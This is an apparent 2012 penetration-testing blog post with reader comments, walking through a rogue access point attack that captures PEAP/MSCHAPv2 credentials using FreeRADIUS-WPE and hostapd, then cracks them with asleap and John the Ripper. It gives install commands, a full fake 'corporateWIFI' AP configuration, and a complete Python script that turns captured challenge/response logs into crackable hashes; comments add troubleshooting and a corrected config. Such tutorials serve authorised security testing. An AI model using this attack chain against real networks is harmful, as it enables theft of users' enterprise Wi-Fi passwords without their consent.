Tuesday, April 10, 2012

Capturing and cracking a PEAP challenge/response with FreeRADIUS-WPE

By Robert Portvliet.

I figured I would put together a quick post on configuring and using FreeRADIUS-WPE, as lately I’ve seen a few people have issues getting it going on Backtrack 5 R2. To perform a successful attack we’re going to need a couple items, which are the updated FreeRADIUS-WPE package Brad Antoniewicz put together a few months back, and hostapd for our malicious AP. We’re also going to need to put together a .conf file for hostapd to run from.

After booting into Backtrack, go to http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html, and download freeradius-server-wpe_2.1.11-1_i386.deb.

To install, type:
dpkg --install freeradius-server-wpe_2.1.11-1_i386.deb
Then:
ldconfig
Next install hostapd:
apt-get install hostapd

Run the FreeRADIUS-WPE setup from the Backtrack menu, which runs the following:

sh -c "cd /pentest/libs/freeradius-wpe/raddb/certs && ./bootstrap && cp -r * /usr/local/etc/raddb/certs;sudo -s"

The output should finish up looking something like this:


Then, we test that FreeRADIUS is working by:

radiusd -X

("-X" turns on full debugging). It will scroll a bunch of information on the screen, and should end up with the following:


Next, we need a configuration file for hostapd to run from. Here is one Brad Antoniewicz put together a while ago: 

interface=wlan0
driver=nl80211
ssid="corporateWIFI"
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=1
channel=1
wpa_pairwise=TKIP CCMP

Start a monitor mode interface with:

airmon-ng start wlan0

(or in my case wlan1), which will give you the mon0 monitor mode interface.


Next start hostapd and specify the configuration file:


Now that we have hostapd and FreeRADIUS-WPE running, connect to the “corporateWIFI” SSID with your test client and input your credentials. You should see activity in your hostapd window at this point, which will look something like this:


Your client will tell you the login failed (obviously), but if all goes well, when you tail the FreeRADIUS-WPE log, located at /usr/local/var/log/radius/freeradius-server-wpe.log, you’ll see the username, challenge, and response:


Finally, we can use asleap to attempt to crack the challenge/response.


Obviously, you are limited strictly to the words in your wordlist when using asleap, but if you want you can feed the challenge/response to John and use its mangling capabilities. Josh Kelley created a neat Python script called radiusWPE2john.py, which I happened upon on pastebin (http://pastebin.com/RJwgbwNh) that takes the FreeRADIUS-WPE log output and converts the challenge/response into a format that John can understand. Here's a copy of it: 

#!/usr/bin/python

############################################################################### 
# Free Radius WPE log file convertor to John The Ripper formatted file for 
# password cracking.  Use the following format for John:
# ./john --format=NETNTLM freeradius.john
#
# 12/19/2011 - Josh Kelley
###############################################################################

import sys

if len(sys.argv) < 2:
 print "Please feed me the path to the Free Radius WPE log file"
 exit()

fileIn = open(sys.argv[1],'r')
fileOut = open('freeradius.john','w')

i = 0
for line in fileIn:
 lineClean = line.strip()
 lineSplit = lineClean.split(':')
 if lineSplit[0] == "mschap":
  i = i + 1
 if lineSplit[0] == "username":
  username = lineSplit[1].strip()
  i = i + 1
 if lineSplit[0] == "challenge":
  challenge = ""
  for x in lineSplit[1:]:
   challenge = challenge + x
  challenge = challenge.strip()
  i = i + 1
 if lineSplit[0] == "response":
  response = ""
  for x in lineSplit[1:]:  
   response = response + x
  response = response.strip()
  i = i + 1
 if i == 4:
  lineNew = "%s:$NETNTLM$%s$%s" % (username, challenge, response) 
  fileOut.write("%s\n" % lineNew.strip('\n'))
  i = 0
fileIn.close()
fileOut.close()

Run radiusWPE2john.py and point it to the FreeRADIUS-WPE log. It will generate the freeradius.john file with the challenge/ response converted to the proper formatting for John.


Then, simply feed John the freeradius.john file. The comments in RadiusWPE2John give the example of using the argument --format=NETNTLM, but John doesn’t seem to find the hashes when given it. It does find them when using no argument though. (YMMV)


Of course, you can also just pipe the output from John into asleap, as shown below. Make sure to include the dash after the –W switch for asleap. That makes the magic happen. Incidentally, you can do the same thing with CoWPAtty and Aircrack, in both cases putting a dash after the wordlist (-w) parameter let’s you take stdout from John to perform wordlist mangling.


Enjoy!
Posted by at

10 comments:

  1. AnonymousApril 27, 2012 at 7:16 AM

    I'm having some issues cracking the Challenge/Response when the username includes a domain (e.g. DOMAIN\testuser , instead of just testuser).

    I've captured credentials for both 'DOMAIN\testuser' and 'testuser'. Both had the same password and the challenge/response pair was passed into John. The password for 'testuser' is identified almost instantly (in the wordlist), however the password for 'DOMAIN\testuser' isn't (despite being exactly the same).

    Any idea why? Any suggestions?

    ReplyDelete
  2. sparkyMay 30, 2012 at 10:42 PM

    Does this work the same way and have the same capabilities as using freeradius-wpe-2.1.7.patch and using an AP connecting to it? Are there any limitations other than the obvious of having a separate AP? The reason I ask is, I have not been able to patch my freeradius-server-2.1.7 and keep getting the error "freeradius-server-2.1.7/src/lib/.libs/libfreeradius-radius-2.1.7.so: could not read symbols: Invalid operation
    collect2: ld returned 1 exit status
    make[6]: *** [radeapclient] Error 1"

    So I would like an alternative option. this looks wonderful if it can accomplish same results (capture creentials PEAP, etc without the patch.

    Thanks

    ReplyDelete
  3. sparkyMay 31, 2012 at 1:48 PM

    I believe I have everything working correctly up to the point of running "sudo hostapd hostapd-wpe.conf". I get the following errror:

    /pentest/wireless/freeradius-server-2.1.11$ sudo hostapd hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    WPA-PSK enabled, but PSK or passphrase is not configured.
    1 errors found in configuration file 'hostapd-wpe.conf'

    Any suggestions?
    Thanks

    ReplyDelete
  4. sparkyMay 31, 2012 at 11:24 PM

    I would like to document a few modifications and troubleshooting issues that may help some with their installation process. Brad and Robert offered amazing assistance getting this up and running for me. Thanks again guys!

    My personal setup:
    OS: Ubuntu 12.04 (32bit)
    hostapd v0.7.3
    freeradius-server-2.1.11
    freeradius-wpe-2.1.11.patch

    Note: I ended up using the 'freeradius-server-2.1.11.tar.bz2', adding the patch and compiling

    Issue:

    collect2: ld returned 1 exit status
    make[6]: *** [radeapclient] Error 1
    make[6]: Leaving directory `/pentest/wireless/freeradius-server-2.1.7/src/modules/rlm_eap'
    make[5]: *** [common] Error 2
    make[5]: Leaving directory `/pentest/wireless/freeradius-server-2.1.7/src/modules'
    make[4]: *** [all] Error 2
    make[4]: Leaving directory `/pentest/wireless/freeradius-server-2.1.7/src/modules'

    Solution:

    the certs/random file is not present. Add this command and it should fix this error

    'dd if=/dev/urandom of=./random count=10'


    During the hostapd configuration phase, if you experience the error(s):

    Issue:

    @/wireless/freeradius-server-2.1.11$ sudo hostapd hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    WPA-PSK enabled, but PSK or passphrase is not configured.
    1 errors found in configuration file 'hostapd-wpe.conf'

    Solution:

    This error basically means you have the configuration setup for wpa-psk, rather than wpa enterprise

    Add 'wpa_key_mgmt=WPA-EAP' to the hostapd-wpe.conf file


    Issue:

    @/wireless/freeradius-server-2.1.11$ sudo hostapd hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    Could not set interface mon0 flags: Name not unique on network
    nl80211 driver initialization failed.
    ELOOP: remaining socket: sock=4 eloop_data=0x878c8f8 user_data=0x878cf08 handler=0x807c5e0
    ELOOP: remaining socket: sock=6 eloop_data=0x878ed10 user_data=(nil) handler=0x8086770

    Solution:

    In the hostapd-wpe.conf file, change 'interface=mon0' to 'interface=wlan0' (or whatever your card is set to)


    Issue:

    Configuration file: hostapd-wpe.conf
    nl80211: Failed to set interface wlan0 into AP mode
    nl80211 driver initialization failed.
    ELOOP: remaining socket: sock=4 eloop_data=0x87278f8 user_data=0x8727f08 handler=0x807c5e0
    ELOOP: remaining socket: sock=6 eloop_data=0x8729d10 user_data=(nil) handler=0x8086770

    Solution:

    Your wireless card may not support AP mode or you may need a different driver.

    'hostapd-wpe.conf' (should look similar to this)

    interface=wlan0
    driver=nl80211
    ssid="corporateWIFI"
    logger_stdout=-1
    logger_stdout_level=0
    dump_file=/tmp/hostapd.dump
    ieee8021x=1
    eapol_key_index_workaround=0
    own_ip_addr=127.0.0.1
    auth_server_addr=127.0.0.1
    auth_server_port=1812
    auth_server_shared_secret=testing123
    wpa=1
    wpa_key_mgmt=WPA-EAP
    channel=1
    wpa_pairwise=TKIP CCMP

    ReplyDelete
  5. UnknownJune 1, 2012 at 6:53 PM

    Thanks for the write up sparky! glad we could help!!

    -brad

    ReplyDelete
  6. AnonymousJune 6, 2012 at 11:49 AM

    Anonymous, you have to modify the line "with_ntdomain_hack = no" to "with_ntdomain_hack = yes" in the mschap module (/raddb/modules/mschap)...

    ReplyDelete
  7. isa56kAugust 26, 2012 at 4:12 PM

    I am trying this on BT5r3 running VMWare Fusion 5 with an Alfa AWUS036H card.

    But keep getting the error:

    root@bt:~# hostapd hostapd.conf
    Configuration file: hostapd.conf
    Failed to set interface wlan0 to master mode.
    nl80211 driver initialization failed.
    ELOOP: remaining socket: sock=5 eloop_data=0xb09420 user_data=(nil) handler=0x43d3a0

    airbase-ng works fine so if there was an issue with the card, wouldn't that fail too?

    Thx, R.

    ReplyDelete
  8. BehanNovember 8, 2012 at 6:49 PM

    Why would the interface need to be in mon mode with hostapd? As far as I know you configure the SSID, get a client to connect (overpower their current AP), then the challenge/response for mschap is going to go through wpe? If you can do the same thing with a physical access point using open-wrt that just points to wpe then where does mon mode come into play?

    ReplyDelete
    Replies
    1. UnknownNovember 12, 2012 at 1:45 PM

      Sorry for the mistake - that was actually a type-o (that i could have sworn we corrected). It should just need to be the standard wlan0 interface.

      Delete
  9. AnonymousJanuary 11, 2013 at 2:12 PM

    Hi..

    i'm using Backtrack r3 version (multi boot, not VM)
    and i have problem about awus036h..

    i use command is..

    1.ifconfig -a (check all interface.. in my case awus036h is wlan2)

    2.ifconfig wlan2 up
    SIOCSIFFLAGS : invalid argument

    this error message is make me crazy... T_T...
    how can i fix 'SIOCSIFFLAGS : invalid argument' error message?

    Please help me..

    thank you

    ReplyDelete

Subscribe to: Post Comments (Atom)